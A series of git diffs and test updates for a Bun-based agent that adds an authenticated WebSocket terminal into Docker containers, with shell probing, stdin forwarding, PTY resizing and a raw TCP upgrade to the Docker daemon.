 import { describe, expect, test, mock, beforeAll } from 'bun:test';
 import { EventEmitter } from 'node:events';
+import { Readable } from 'node:stream';
+
+/** Readable stream whose data/end/error can be driven from outside. */
+function makeControllableStream() {
+  const readable = new Readable({ read() {} });
+  return {
+    stream: readable,
+    push: (data: Buffer | null) => readable.push(data),
+    error: (err: Error) => readable.destroy(err),
+  };
+}
 
 beforeAll(() => {
   console.error = mock(() => {});
@@ -118,24 +129,19 @@ describe('handleExecSocket', () => {
   });
 
   test('sends exec output to WebSocket', async () => {
-    const execEmitter = new EventEmitter();
-    let probeCallCount = 0;
+    const { stream: execStream, push } = makeControllableStream();
 
     const mockContainer = {
       exec: mock(async (opts: { Cmd: string[]; Tty?: boolean }) => {
         if (!opts.Tty) {
-          // Probe call
-          probeCallCount++;
-          const probe = new EventEmitter();
           return {
-            start: mock(async () => { setTimeout(() => probe.emit('end'), 5); return probe; }),
+            start: mock(async () => {}),
             inspect: mock(async () => ({ ExitCode: 0 })),
             resize: mock(async () => {}),
           };
         }
-        // Actual exec
         return {
-          start: mock(async () => execEmitter),
+          start: mock(async () => execStream),
           inspect: mock(async () => ({ ExitCode: 0 })),
           resize: mock(async () => {}),
         };
@@ -147,26 +153,26 @@ describe('handleExecSocket', () => {
 
     await handleExecSocket(mockDocker as any, 'abc123', mockWs as any);
 
-    execEmitter.emit('data', Buffer.from('hello'));
-    await new Promise((r) => setTimeout(r, 10));
+    push(Buffer.from('hello'));
+    await new Promise((r) => setTimeout(r, 20));
 
     expect(mockWs.send).toHaveBeenCalledWith(Buffer.from('hello'));
   });
 
   test('closes WebSocket with 1000 when exec stream ends', async () => {
-    const execEmitter = Object.assign(new EventEmitter(), { destroy: mock(() => {}) });
+    const { stream: execStream, push } = makeControllableStream();
+
     const mockContainer = {
       exec: mock(async (opts: { Cmd: string[]; Tty?: boolean }) => {
         if (!opts.Tty) {
-          const probe = new EventEmitter();
           return {
-            start: mock(async () => { setTimeout(() => probe.emit('end'), 5); return probe; }),
+            start: mock(async () => {}),
             inspect: mock(async () => ({ ExitCode: 0 })),
             resize: mock(async () => {}),
           };
         }
         return {
-          start: mock(async () => execEmitter),
+          start: mock(async () => execStream),
           inspect: mock(async () => ({ ExitCode: 0 })),
           resize: mock(async () => {}),
         };
@@ -177,26 +183,26 @@ describe('handleExecSocket', () => {
 
     await handleExecSocket(mockDocker as any, 'abc123', mockWs as any);
 
-    execEmitter.emit('end');
-    await new Promise((r) => setTimeout(r, 10));
+    push(null); // end the stream
+    await new Promise((r) => setTimeout(r, 20));
 
     expect(mockWs.close).toHaveBeenCalledWith(1000, 'Shell exited');
   });
 
   test('closes WebSocket with 1011 when exec stream errors', async () => {
-    const execEmitter = Object.assign(new EventEmitter(), { destroy: mock(() => {}) });
+    const { stream: execStream, error: errorStream } = makeControllableStream();
+
     const mockContainer = {
       exec: mock(async (opts: { Cmd: string[]; Tty?: boolean }) => {
         if (!opts.Tty) {
-          const probe = new EventEmitter();
           return {
-            start: mock(async () => { setTimeout(() => probe.emit('end'), 5); return probe; }),
+            start: mock(async () => {}),
             inspect: mock(async () => ({ ExitCode: 0 })),
             resize: mock(async () => {}),
           };
         }
         return {
-          start: mock(async () => execEmitter),
+          start: mock(async () => execStream),
           inspect: mock(async () => ({ ExitCode: 0 })),
           resize: mock(async () => {}),
         };
@@ -207,8 +213,8 @@ describe('handleExecSocket', () => {
 
     await handleExecSocket(mockDocker as any, 'abc123', mockWs as any);
 
-    execEmitter.emit('error', new Error('pipe broken'));
-    await new Promise((r) => setTimeout(r, 10));
+    errorStream(new Error('pipe broken'));
+    await new Promise((r) => setTimeout(r, 20));
 
     expect(mockWs.close).toHaveBeenCalledWith(1011, 'Exec stream error');
   });

--- a/agent/src/__tests__/exec.test.ts
+++ b/agent/src/__tests__/exec.test.ts
@@ -152,4 +152,64 @@ describe('handleExecSocket', () => {
 
     expect(mockWs.send).toHaveBeenCalledWith(Buffer.from('hello'));
   });
+
+  test('closes WebSocket with 1000 when exec stream ends', async () => {
+    const execEmitter = Object.assign(new EventEmitter(), { destroy: mock(() => {}) });
+    const mockContainer = {
+      exec: mock(async (opts: { Cmd: string[]; Tty?: boolean }) => {
+        if (!opts.Tty) {
+          const probe = new EventEmitter();
+          return {
+            start: mock(async () => { setTimeout(() => probe.emit('end'), 5); return probe; }),
+            inspect: mock(async () => ({ ExitCode: 0 })),
+            resize: mock(async () => {}),
+          };
+        }
+        return {
+          start: mock(async () => execEmitter),
+          inspect: mock(async () => ({ ExitCode: 0 })),
+          resize: mock(async () => {}),
+        };
+      }),
+    };
+    const mockDocker = { getContainer: mock(() => mockContainer) };
+    const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'bash', cols: 80, rows: 24 } };
+
+    await handleExecSocket(mockDocker as any, 'abc123', mockWs as any);
+
+    execEmitter.emit('end');
+    await new Promise((r) => setTimeout(r, 10));
+
+    expect(mockWs.close).toHaveBeenCalledWith(1000, 'Shell exited');
+  });
+
+  test('closes WebSocket with 1011 when exec stream errors', async () => {
+    const execEmitter = Object.assign(new EventEmitter(), { destroy: mock(() => {}) });
+    const mockContainer = {
+      exec: mock(async (opts: { Cmd: string[]; Tty?: boolean }) => {
+        if (!opts.Tty) {
+          const probe = new EventEmitter();
+          return {
+            start: mock(async () => { setTimeout(() => probe.emit('end'), 5); return probe; }),
+            inspect: mock(async () => ({ ExitCode: 0 })),
+            resize: mock(async () => {}),
+          };
+        }
+        return {
+          start: mock(async () => execEmitter),
+          inspect: mock(async () => ({ ExitCode: 0 })),
+          resize: mock(async () => {}),
+        };
+      }),
+    };
+    const mockDocker = { getContainer: mock(() => mockContainer) };
+    const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'bash', cols: 80, rows: 24 } };
+
+    await handleExecSocket(mockDocker as any, 'abc123', mockWs as any);
+
+    execEmitter.emit('error', new Error('pipe broken'));
+    await new Promise((r) => setTimeout(r, 10));
+
+    expect(mockWs.close).toHaveBeenCalledWith(1011, 'Exec stream error');
+  });
 });

--- a/agent/src/index.ts
+++ b/agent/src/index.ts
@@ -83,6 +83,8 @@ const tlsConfig = TLS_CERT_PATH && TLS_KEY_PATH
   : undefined;
 
 let docker: Dockerode | null = null;
+let dockerHostname = '';
+let dockerPortNum = 0;
 if (DOCKER_HOST) {
   let dockerUrl: URL;
   try {
@@ -92,10 +94,11 @@ if (DOCKER_HOST) {
     process.exit(1);
   }
   const isHttps = dockerUrl.protocol === 'https:';
-  const dockerPort = Number(dockerUrl.port) || (isHttps ? 2376 : 2375);
+  dockerPortNum = Number(dockerUrl.port) || (isHttps ? 2376 : 2375);
+  dockerHostname = dockerUrl.hostname;
   docker = new Dockerode({
-    host: dockerUrl.hostname,
-    port: dockerPort,
+    host: dockerHostname,
+    port: dockerPortNum,
     protocol: isHttps ? 'https' : 'http',
   });
 }
@@ -149,7 +152,7 @@ Bun.serve<ExecWebSocketData>({
   websocket: {
     async open(ws) {
       if (!docker) { ws.close(1011, 'Docker not available'); return; }
-      await handleExecSocket(docker, ws.data.containerId, ws as Parameters<typeof handleExecSocket>[2]);
+      await handleExecSocket(docker, dockerHostname, dockerPortNum, ws.data.containerId, ws as Parameters<typeof handleExecSocket>[4]);
     },
     async message(ws, message) {
       if (!ws.data.execStream || !ws.data.execInstance) return;

--- a/agent/src/index.ts
+++ b/agent/src/index.ts
@@ -150,6 +150,10 @@ Bun.serve<ExecWebSocketData>({
   port: PORT,
   tls: tlsConfig,
   websocket: {
+    // An interactive TTY exec session must not time out on idle: the user can
+    // sit at a prompt for many minutes without typing. Bun's default 120s
+    // would close the socket from under them. 0 disables the timeout.
+    idleTimeout: 0,
     async open(ws) {
       if (!docker) { ws.close(1011, 'Docker not available'); return; }
       await handleExecSocket(docker, dockerHostname, dockerPortNum, ws.data.containerId, ws as Parameters<typeof handleExecSocket>[4]);
@@ -173,7 +177,7 @@ Bun.serve<ExecWebSocketData>({
       const authError = await authenticateRequest(request.headers, TRUSTED_PUBKEY, url.pathname);
       if (authError) return authError;
 
-      // WebSocket upgrade for exec sessions — must happen before matchRoute since server.upgrade() is Bun-specific
+      // WebSocket upgrade for exec sessions: must happen before matchRoute since server.upgrade() is Bun-specific
       if (docker && request.headers.get('upgrade') === 'websocket') {
         const execMatch = /^\/exec\/([a-zA-Z0-9][a-zA-Z0-9_.-]*)$/.exec(url.pathname);
         if (execMatch) {

--- a/agent/src/index.ts
+++ b/agent/src/index.ts
@@ -8,6 +8,7 @@ import { handleContainerEvents } from './routes/containers-events';
 import { handleZfsStatsStream, handleZfsPools } from './routes/zfs';
 import { detectZfsCapabilities } from './lib/zfs-capabilities';
 import { handleAgentUpdate } from './routes/agent-update';
+import { handleExecSocket, handleExecMessage } from './routes/exec';
 
 const portEnv = process.env.AGENT_PORT;
 let PORT = 9090;
@@ -133,15 +134,55 @@ function matchRoute(request: Request, url: URL): Promise<Response> | Response | 
   return null;
 }
 
-Bun.serve({
+interface ExecWebSocketData {
+  containerId: string;
+  shell: string;
+  cols: number;
+  rows: number;
+  execStream?: import('node:stream').Duplex;
+  execInstance?: { resize(opts: { h: number; w: number }): Promise<void> };
+}
+
+Bun.serve<ExecWebSocketData>({
   port: PORT,
   tls: tlsConfig,
-  async fetch(request: Request): Promise<Response> {
+  websocket: {
+    async open(ws) {
+      if (!docker) { ws.close(1011, 'Docker not available'); return; }
+      await handleExecSocket(docker, ws.data.containerId, ws as Parameters<typeof handleExecSocket>[2]);
+    },
+    async message(ws, message) {
+      if (!ws.data.execStream || !ws.data.execInstance) return;
+      await handleExecMessage(
+        message as string | Buffer,
+        ws.data.execStream,
+        ws.data.execInstance,
+      );
+    },
+    close(ws) {
+      ws.data.execStream?.destroy();
+    },
+  },
+  async fetch(request: Request, server): Promise<Response> {
     try {
       const url = new URL(request.url);
 
       const authError = await authenticateRequest(request.headers, TRUSTED_PUBKEY, url.pathname);
       if (authError) return authError;
+
+      // WebSocket upgrade for exec sessions — must happen before matchRoute since server.upgrade() is Bun-specific
+      if (docker && request.headers.get('upgrade') === 'websocket') {
+        const execMatch = /^\/exec\/([a-zA-Z0-9][a-zA-Z0-9_.-]*)$/.exec(url.pathname);
+        if (execMatch) {
+          const containerId = execMatch[1];
+          const shell = url.searchParams.get('shell') ?? 'auto';
+          const cols = Number(url.searchParams.get('cols') ?? 80);
+          const rows = Number(url.searchParams.get('rows') ?? 24);
+          const upgraded = server.upgrade(request, { data: { containerId, shell, cols, rows } });
+          if (upgraded) return undefined as unknown as Response;
+          return new Response('WebSocket upgrade failed', { status: 426 });
+        }
+      }
 
       return (await matchRoute(request, url)) ?? new Response('Not Found', { status: 404 });
     } catch (error) {

--- a/agent/src/routes/exec.ts
+++ b/agent/src/routes/exec.ts
@@ -1,0 +1,198 @@
+import type Dockerode from 'dockerode';
+import type { EventEmitter } from 'node:events';
+import type { Duplex } from 'node:stream';
+
+/** Candidate shells probed in order when preferred is 'auto'. */
+const PROBE_SHELLS = ['bash', 'sh', 'ash'] as const;
+
+interface ExecInstance {
+  start(opts: { hijack: boolean; stdin: boolean }): Promise<Duplex>;
+  resize(opts: { h: number; w: number }): Promise<void>;
+  inspect(): Promise<{ ExitCode: number }>;
+}
+
+interface ResizeMessage {
+  type: 'resize';
+  cols: number;
+  rows: number;
+}
+
+/**
+ * Determine which shell binary is available in the container.
+ *
+ * When `preferred` is `'auto'`, probes bash, sh, and ash in that order by
+ * running `<shell> -c 'exit 0'` with Tty:false and checking ExitCode. The
+ * first shell that exits 0 is returned. Returns `''` when none succeed.
+ *
+ * When `preferred` is any other string, it is returned directly without
+ * probing — the caller is responsible for choosing a valid shell name.
+ *
+ * @param container - Dockerode container instance
+ * @param preferred - Shell name to use, or 'auto' to probe
+ * @returns Resolved shell name, or '' if no supported shell found
+ */
+export async function probeShell(container: Dockerode.Container, preferred: string): Promise<string> {
+  if (preferred !== 'auto') return preferred;
+
+  for (const shell of PROBE_SHELLS) {
+    try {
+      const exec = await container.exec({
+        Cmd: [shell, '-c', 'exit 0'],
+        AttachStdout: false,
+        AttachStderr: false,
+        AttachStdin: false,
+        Tty: false,
+      }) as unknown as ExecInstance;
+
+      // Start the probe process and wait for it to exit before inspecting.
+      // inspect() returns ExitCode -1 while the process is still running, so
+      // reading it before the stream ends is a race that produces false negatives.
+      // The 5s timeout prevents an indefinite hang if the container is paused
+      // or the exec process never exits; inspect() will return -1 in that case
+      // and the probe correctly falls through to the next candidate.
+      const stream = await exec.start({ hijack: true, stdin: false });
+      await Promise.race([
+        new Promise<void>((resolve) => {
+          (stream as unknown as EventEmitter).once('end', resolve);
+        }),
+        new Promise<void>((resolve) => setTimeout(resolve, 5_000)),
+      ]);
+      const { ExitCode } = await exec.inspect();
+      if (ExitCode === 0) return shell;
+    } catch {
+      // Shell not found or exec failed; try next candidate.
+    }
+  }
+
+  return '';
+}
+
+/**
+ * Process a single WebSocket message from the terminal client.
+ *
+ * JSON strings with `{ type: 'resize', cols, rows }` resize the PTY.
+ * All other messages (binary Buffer or non-resize string) are forwarded
+ * directly to the exec stream as stdin.
+ *
+ * @param message - Raw WebSocket message (string or Buffer)
+ * @param stream - Writable exec stream (stdin to the container process)
+ * @param exec - Dockerode exec instance used for PTY resize
+ */
+export async function handleExecMessage(
+  message: string | Buffer,
+  stream: Pick<Duplex, 'write'>,
+  exec: Pick<ExecInstance, 'resize'>,
+): Promise<void> {
+  if (typeof message === 'string') {
+    try {
+      const parsed = JSON.parse(message) as unknown;
+      if (
+        parsed !== null &&
+        typeof parsed === 'object' &&
+        (parsed as ResizeMessage).type === 'resize'
+      ) {
+        const { cols, rows } = parsed as ResizeMessage;
+        await exec.resize({ h: rows, w: cols });
+        return;
+      }
+    } catch {
+      // Not JSON — treat as raw stdin.
+    }
+    stream.write(message);
+  } else {
+    stream.write(message);
+  }
+}
+
+interface ExecSocketData {
+  shell: string;
+  cols: number;
+  rows: number;
+  execStream?: Duplex;
+  execInstance?: ExecInstance;
+}
+
+interface WsHandle {
+  send(data: Buffer | string): void;
+  close(code: number, reason: string): void;
+  data: ExecSocketData;
+}
+
+/**
+ * Open a TTY exec session inside a container and wire it to a WebSocket.
+ *
+ * Reads `ws.data.{ shell, cols, rows }`. If `shell` is `'auto'`, probes
+ * bash/sh/ash in order. Closes the socket with 1011 if no shell is found.
+ *
+ * On success:
+ * - Starts a TTY exec with the resolved shell.
+ * - Sets initial PTY dimensions via exec.resize.
+ * - Forwards exec stream `data` chunks to `ws.send`.
+ * - Closes the socket (1000) when the exec stream ends.
+ * - Closes the socket (1011) on exec stream error.
+ * - Stores `execStream` and `execInstance` on `ws.data` so the caller's
+ *   `message` and `close` handlers can forward stdin and handle cleanup.
+ *
+ * @param docker - Dockerode client
+ * @param containerId - Target container ID or name
+ * @param ws - Bun WebSocket handle with `data: ExecSocketData`
+ */
+export async function handleExecSocket(
+  docker: Pick<Dockerode, 'getContainer'>,
+  containerId: string,
+  ws: WsHandle,
+): Promise<void> {
+  const { shell: preferredShell, cols, rows } = ws.data;
+
+  const container = docker.getContainer(containerId);
+  const shell = await probeShell(container, preferredShell);
+
+  if (shell === '') {
+    ws.close(1011, 'No supported shell found in container');
+    return;
+  }
+
+  try {
+    const exec = await container.exec({
+      Cmd: [shell],
+      AttachStdin: true,
+      AttachStdout: true,
+      AttachStderr: true,
+      Tty: true,
+    }) as unknown as ExecInstance;
+
+    const stream = await exec.start({ hijack: true, stdin: true });
+
+    // Set the initial PTY size to match what the client reported.
+    await exec.resize({ h: rows, w: cols });
+
+    // Expose stream and exec instance for the WS message/close handlers.
+    ws.data.execStream = stream;
+    ws.data.execInstance = exec;
+
+    let closed = false;
+
+    stream.on('data', (chunk: Buffer) => {
+      if (closed) return;
+      try { ws.send(chunk); } catch { closed = true; }
+    });
+
+    stream.on('end', () => {
+      if (closed) return;
+      closed = true;
+      try { ws.close(1000, 'Shell exited'); } catch { /* already closed */ }
+      stream.destroy();
+    });
+
+    stream.on('error', (err: Error) => {
+      if (closed) return;
+      closed = true;
+      console.error(`Exec stream error for container ${containerId}:`, err.message);
+      try { ws.close(1011, 'Exec stream error'); } catch { /* already closed */ }
+      stream.destroy();
+    });
+  } catch (err) {
+    console.error(`Failed to start exec session for container ${containerId}:`, err);
+    ws.close(1011, 'Failed to start exec session');
+  }
+}

--- a/agent/src/routes/exec.ts
+++ b/agent/src/routes/exec.ts
@@ -1,5 +1,4 @@
 import type Dockerode from 'dockerode';
-import type { EventEmitter } from 'node:events';
 import type { Duplex } from 'node:stream';
 
 /** Candidate shells probed in order when preferred is 'auto'. */
@@ -44,20 +43,21 @@ export async function probeShell(container: Dockerode.Container, preferred: stri
         Tty: false,
       }) as unknown as ExecInstance;
 
-      // Start the probe process and wait for it to exit before inspecting.
-      // inspect() returns ExitCode -1 while the process is still running, so
-      // reading it before the stream ends is a race that produces false negatives.
-      // The 5s timeout prevents an indefinite hang if the container is paused
-      // or the exec process never exits; inspect() will return -1 in that case
-      // and the probe correctly falls through to the next candidate.
-      const stream = await exec.start({ hijack: true, stdin: false });
-      await Promise.race([
-        new Promise<void>((resolve) => {
-          (stream as unknown as EventEmitter).once('end', resolve);
-        }),
-        new Promise<void>((resolve) => setTimeout(resolve, 5_000)),
-      ]);
-      const { ExitCode } = await exec.inspect();
+      // Detach:true starts the process without attaching any stream and
+      // returns immediately. hijack:true (the interactive mode) keeps the TCP
+      // connection open waiting for muxed output — with no outputs attached
+      // the stream never emits 'end', so every probe hit the 5s timeout and
+      // then received ExitCode -1 (process already exited but socket still open).
+      await (exec as unknown as { start(o: { Detach: boolean }): Promise<void> }).start({ Detach: true });
+
+      // Poll until Docker sets ExitCode; it returns -1 while the process is
+      // still running. 'exit 0' completes in <50ms; 2s is a generous bound.
+      const deadline = Date.now() + 2_000;
+      let { ExitCode } = await exec.inspect();
+      while (ExitCode === -1 && Date.now() < deadline) {
+        await new Promise<void>((r) => setTimeout(r, 50));
+        ({ ExitCode } = await exec.inspect());
+      }
       if (ExitCode === 0) return shell;
     } catch {
       // Shell not found or exec failed; try next candidate.

--- a/agent/src/routes/exec.ts
+++ b/agent/src/routes/exec.ts
@@ -142,7 +142,12 @@ export async function handleExecSocket(
   containerId: string,
   ws: WsHandle,
 ): Promise<void> {
-  const { shell: preferredShell, cols, rows } = ws.data;
+  // Messages arriving before execStream is set on ws.data are silently dropped by
+  // the Bun.serve message handler. This window is short (shell probe + exec start),
+  // and the client's xterm skeleton hides input until the connection is established.
+  const { shell: preferredShell } = ws.data;
+  const cols = Math.max(1, Math.min(ws.data.cols, 500));
+  const rows = Math.max(1, Math.min(ws.data.rows, 500));
 
   const container = docker.getContainer(containerId);
   const shell = await probeShell(container, preferredShell);

--- a/agent/src/routes/exec.ts
+++ b/agent/src/routes/exec.ts
@@ -1,13 +1,88 @@
 import type Dockerode from 'dockerode';
 import type { Duplex } from 'node:stream';
+import net from 'node:net';
 
 /** Candidate shells probed in order when preferred is 'auto'. */
 const PROBE_SHELLS = ['bash', 'sh', 'ash'] as const;
 
 interface ExecInstance {
+  id?: string;
   start(opts: { hijack: boolean; stdin: boolean }): Promise<Duplex>;
   resize(opts: { h: number; w: number }): Promise<void>;
   inspect(): Promise<{ ExitCode: number }>;
+}
+
+/**
+ * Start a Docker exec with an HTTP Upgrade and return the hijacked socket.
+ *
+ * dockerode's `exec.start({ hijack: true })` listens for `req.on('upgrade')`,
+ * but Bun's `node:http` polyfill fires `req.on('response')` with statusCode
+ * 101 instead, so the upgrade callback never resolves. We do the upgrade by
+ * hand over a raw TCP socket so the returned Duplex works in Bun.
+ */
+export interface ExecRawTcpResult {
+  /** The hijacked TCP socket. Use directly as a Duplex for stdin/stdout. */
+  socket: net.Socket;
+  /** Bytes already received past the HTTP response (e.g. shell prompt). Empty if none. */
+  initialBytes: Buffer;
+}
+
+export async function startExecRawTcp(
+  host: string,
+  port: number,
+  execId: string,
+): Promise<ExecRawTcpResult> {
+  return new Promise((resolve, reject) => {
+    const body = JSON.stringify({ Detach: false, Tty: true });
+    const httpReq =
+      `POST /exec/${execId}/start HTTP/1.1\r\n` +
+      `Host: ${host}:${port}\r\n` +
+      `Content-Type: application/json\r\n` +
+      `Content-Length: ${Buffer.byteLength(body)}\r\n` +
+      `Connection: Upgrade\r\n` +
+      `Upgrade: tcp\r\n` +
+      `\r\n` +
+      body;
+
+    const sock = net.connect({ host, port });
+    let buffer = Buffer.alloc(0);
+    let resolved = false;
+
+    const onError = (err: Error) => {
+      if (resolved) return;
+      resolved = true;
+      sock.destroy();
+      reject(err);
+    };
+
+    const onData = (chunk: Buffer) => {
+      if (resolved) return;
+      buffer = Buffer.concat([buffer, chunk]);
+      const idx = buffer.indexOf(Buffer.from('\r\n\r\n'));
+      if (idx === -1) return;
+      const headerStr = buffer.subarray(0, idx).toString('utf8');
+      const remainder = buffer.subarray(idx + 4);
+      const statusLine = headerStr.split('\r\n')[0];
+      const match = /^HTTP\/1\.\d (\d+)/.exec(statusLine);
+      if (!match) {
+        onError(new Error(`Bad HTTP response: ${statusLine}`));
+        return;
+      }
+      const status = Number(match[1]);
+      if (status !== 101) {
+        onError(new Error(`Expected 101 Switching Protocols, got ${status}: ${headerStr}`));
+        return;
+      }
+      resolved = true;
+      sock.removeListener('data', onData);
+      sock.removeListener('error', onError);
+      resolve({ socket: sock, initialBytes: remainder });
+    };
+
+    sock.once('connect', () => sock.write(httpReq));
+    sock.on('data', onData);
+    sock.on('error', onError);
+  });
 }
 
 interface ResizeMessage {
@@ -139,8 +214,12 @@ interface WsHandle {
  */
 export async function handleExecSocket(
   docker: Pick<Dockerode, 'getContainer'>,
+  dockerHost: string,
+  dockerPort: number,
   containerId: string,
   ws: WsHandle,
+  startStream: (host: string, port: number, execId: string) => Promise<ExecRawTcpResult> =
+    startExecRawTcp,
 ): Promise<void> {
   // Messages arriving before execStream is set on ws.data are silently dropped by
   // the Bun.serve message handler. This window is short (shell probe + exec start),
@@ -166,8 +245,18 @@ export async function handleExecSocket(
       Tty: true,
       Env: ['TERM=xterm-256color'],
     }) as unknown as ExecInstance;
+    if (!exec.id) throw new Error('container.exec returned exec without id');
 
-    const stream = await exec.start({ hijack: true, stdin: true });
+    // Use raw TCP HTTP upgrade rather than `exec.start({ hijack: true })`
+    // because Bun's node:http fires 'response' for 101 instead of 'upgrade',
+    // causing dockerode's hijack callback to hang forever.
+    const { socket, initialBytes } = await startStream(dockerHost, dockerPort, exec.id);
+    const stream: Duplex = socket;
+
+    // Announce the resolved shell as a JSON text control frame so the client
+    // can show e.g. `auto (sh)` in the shell picker. Sent before any binary
+    // output; binary frames are terminal stdout/stderr.
+    try { ws.send(JSON.stringify({ type: 'shell', name: shell })); } catch { /* socket gone */ }
 
     // Wire up listeners before resize so exec output is never buffered without
     // a consumer. resize() is a separate HTTP round-trip that can be slow or
@@ -178,16 +267,20 @@ export async function handleExecSocket(
 
     let closed = false;
 
-    // Fire-and-forget the initial resize — PTY starts at Docker's default (80x24)
+    // Forward bytes that arrived past the HTTP response (typical: shell prompt).
+    if (initialBytes.length > 0) {
+      try { ws.send(initialBytes); } catch { closed = true; }
+    }
+
+    // Fire-and-forget the initial resize. PTY starts at Docker's default (80x24)
     // and jumps to the client's reported size once this resolves.
     void exec.resize({ h: rows, w: cols }).catch((e: Error) => {
       console.error(`Exec resize failed for ${containerId}:`, e.message);
     });
 
     // Use async iteration rather than the 'data' event listener. Bun's Node.js
-    // compat layer doesn't reliably emit 'data' events on the raw TCP socket
-    // obtained via docker-modem's HTTP upgrade hijack, but it does implement
-    // Symbol.asyncIterator on the same stream object.
+    // compat layer doesn't reliably emit 'data' events on the raw TCP socket,
+    // but Symbol.asyncIterator works on the same stream object.
     void (async () => {
       try {
         for await (const chunk of stream as AsyncIterable<Buffer>) {

--- a/agent/src/routes/exec.ts
+++ b/agent/src/routes/exec.ts
@@ -41,6 +41,7 @@ export async function startExecRawTcp(
   host: string,
   port: number,
   execId: string,
+  connectFn: (opts: { host: string; port: number }) => net.Socket = net.connect,
 ): Promise<ExecRawTcpResult> {
   return new Promise((resolve, reject) => {
     const body = JSON.stringify({ Detach: false, Tty: true });
@@ -54,13 +55,26 @@ export async function startExecRawTcp(
       `\r\n` +
       body;
 
-    const sock = net.connect({ host, port });
+    const sock = connectFn({ host, port });
     let buffer = Buffer.alloc(0);
     let resolved = false;
+
+    // Use a plain timer rather than sock.setTimeout: sock.setTimeout is an idle
+    // timer that resets on each chunk and is harder to clear reliably across
+    // Node/Bun versions. clearTimeout(id) always wins.
+    const upgradeTimer = setTimeout(() => {
+      if (resolved) return;
+      resolved = true;
+      sock.destroy();
+      reject(new Error('Timeout waiting for Docker HTTP upgrade response'));
+    }, 10_000);
+
+    const settle = () => clearTimeout(upgradeTimer);
 
     const onError = (err: Error) => {
       if (resolved) return;
       resolved = true;
+      settle();
       sock.destroy();
       reject(err);
     };
@@ -84,6 +98,7 @@ export async function startExecRawTcp(
         return;
       }
       resolved = true;
+      settle();
       sock.removeListener('data', onData);
       sock.removeListener('error', onError);
       resolve({ socket: sock, initialBytes: remainder });
@@ -92,6 +107,19 @@ export async function startExecRawTcp(
     sock.once('connect', () => sock.write(httpReq));
     sock.on('data', onData);
     sock.on('error', onError);
+    sock.once('close', () => {
+      if (resolved) return;
+      resolved = true;
+      settle();
+      reject(new Error('Docker TCP connection closed before HTTP upgrade completed'));
+    });
+    sock.once('end', () => {
+      if (resolved) return;
+      resolved = true;
+      settle();
+      sock.destroy();
+      reject(new Error('Docker daemon closed connection before sending 101'));
+    });
   });
 }
 
@@ -192,7 +220,11 @@ export async function handleExecMessage(
   exec: Pick<ExecInstance, 'resize'>,
 ): Promise<void> {
   if (typeof message !== 'string') {
-    stream.write(message);
+    try {
+      stream.write(message);
+    } catch (err) {
+      console.error('Failed to write binary to exec stream:', err instanceof Error ? err.message : String(err));
+    }
     return;
   }
 
@@ -201,7 +233,11 @@ export async function handleExecMessage(
     parsed = JSON.parse(message);
   } catch {
     // Not JSON; treat as raw stdin.
-    stream.write(message);
+    try {
+      stream.write(message);
+    } catch (err) {
+      console.error('Failed to write stdin to exec stream:', err instanceof Error ? err.message : String(err));
+    }
     return;
   }
 
@@ -219,8 +255,9 @@ export async function handleExecMessage(
           h: Math.max(1, Math.min(rows as number, 500)),
           w: Math.max(1, Math.min(cols as number, 500)),
         });
-      } catch {
+      } catch (err) {
         // resize is best-effort; the PTY keeps its previous size
+        console.error(`Exec resize failed:`, err instanceof Error ? err.message : String(err));
       }
     }
     return;
@@ -228,7 +265,11 @@ export async function handleExecMessage(
 
   // Valid JSON but not a resize message: forward as raw stdin (rare; user
   // could legitimately type JSON in their shell).
-  stream.write(message);
+  try {
+    stream.write(message);
+  } catch (err) {
+    console.error('Failed to write JSON stdin to exec stream:', err instanceof Error ? err.message : String(err));
+  }
 }
 
 interface ExecSocketData {

--- a/agent/src/routes/exec.ts
+++ b/agent/src/routes/exec.ts
@@ -2,7 +2,14 @@ import type Dockerode from 'dockerode';
 import type { Duplex } from 'node:stream';
 import net from 'node:net';
 
-/** Candidate shells probed in order when preferred is 'auto'. */
+/**
+ * Candidate shells probed in order when preferred is 'auto'.
+ *
+ * zsh is intentionally absent here even though it appears in
+ * ALLOWED_EXPLICIT_SHELLS: zsh has a slow startup and is rare in containers,
+ * so probing for it on every auto session would add latency for the common
+ * case. A user who specifically wants zsh can request it by name.
+ */
 const PROBE_SHELLS = ['bash', 'sh', 'ash'] as const;
 
 /** Shells the client is allowed to request explicitly. Anything else is rejected. */
@@ -142,8 +149,26 @@ export async function probeShell(container: Dockerode.Container, preferred: stri
         ({ ExitCode } = await exec.inspect());
       }
       if (ExitCode === 0) return shell;
-    } catch {
-      // Shell not found or exec failed; try next candidate.
+      if (ExitCode === -1) {
+        // Distinguish a slow/stuck Docker from "shell does not exist": a clean
+        // failure sets a non-zero exit code, but -1 after 5s means the probe
+        // process never reported back. Operator needs to know this is not a
+        // missing-shell scenario before the user sees 1011 "No supported shell".
+        console.warn('exec probe deadline expired (still running after 5s)', {
+          shell,
+          containerId: container.id,
+          exitCode: -1,
+        });
+      }
+    } catch (err) {
+      // Surface the actual error so an operator can diagnose Docker daemon
+      // problems (ECONNREFUSED, EPIPE, broken socket) instead of seeing
+      // "No supported shell found in container" 3 swallowed failures later.
+      console.error('exec probe failed', {
+        shell,
+        containerId: container.id,
+        err: err instanceof Error ? err.message : String(err),
+      });
     }
   }
 
@@ -250,7 +275,7 @@ export async function handleExecSocket(
 ): Promise<void> {
   // Messages arriving before execStream is set on ws.data are silently dropped by
   // the Bun.serve message handler. This window is short (shell probe + exec start),
-  // and the client's xterm skeleton hides input until the connection is established.
+  // and the client typically isn't typing yet because the terminal is still painting.
   const { shell: preferredShell } = ws.data;
   // Math.min(NaN, 500) is NaN, which Docker rejects. Guard with isFinite and
   // fall back to xterm defaults so malformed cols/rows don't break the session.
@@ -284,8 +309,16 @@ export async function handleExecSocket(
 
     // Announce the resolved shell as a JSON text control frame so the client
     // can show e.g. `auto (sh)` in the shell picker. Sent before any binary
-    // output; binary frames are terminal stdout/stderr.
-    try { ws.send(JSON.stringify({ type: 'shell', name: shell })); } catch { /* socket gone */ }
+    // output; binary frames are terminal stdout/stderr. If this throws the
+    // WS is already dead, so tear down the Docker socket and bail rather than
+    // attaching listeners and starting the async iterator on an orphan exec.
+    try {
+      ws.send(JSON.stringify({ type: 'shell', name: shell }));
+    } catch (err) {
+      console.error(`Failed to announce shell for container ${containerId}:`, err instanceof Error ? err.message : String(err));
+      socket.destroy();
+      return;
+    }
 
     // Wire up listeners before resize so exec output is never buffered without
     // a consumer. resize() is a separate HTTP round-trip that can be slow or
@@ -297,8 +330,18 @@ export async function handleExecSocket(
     let closed = false;
 
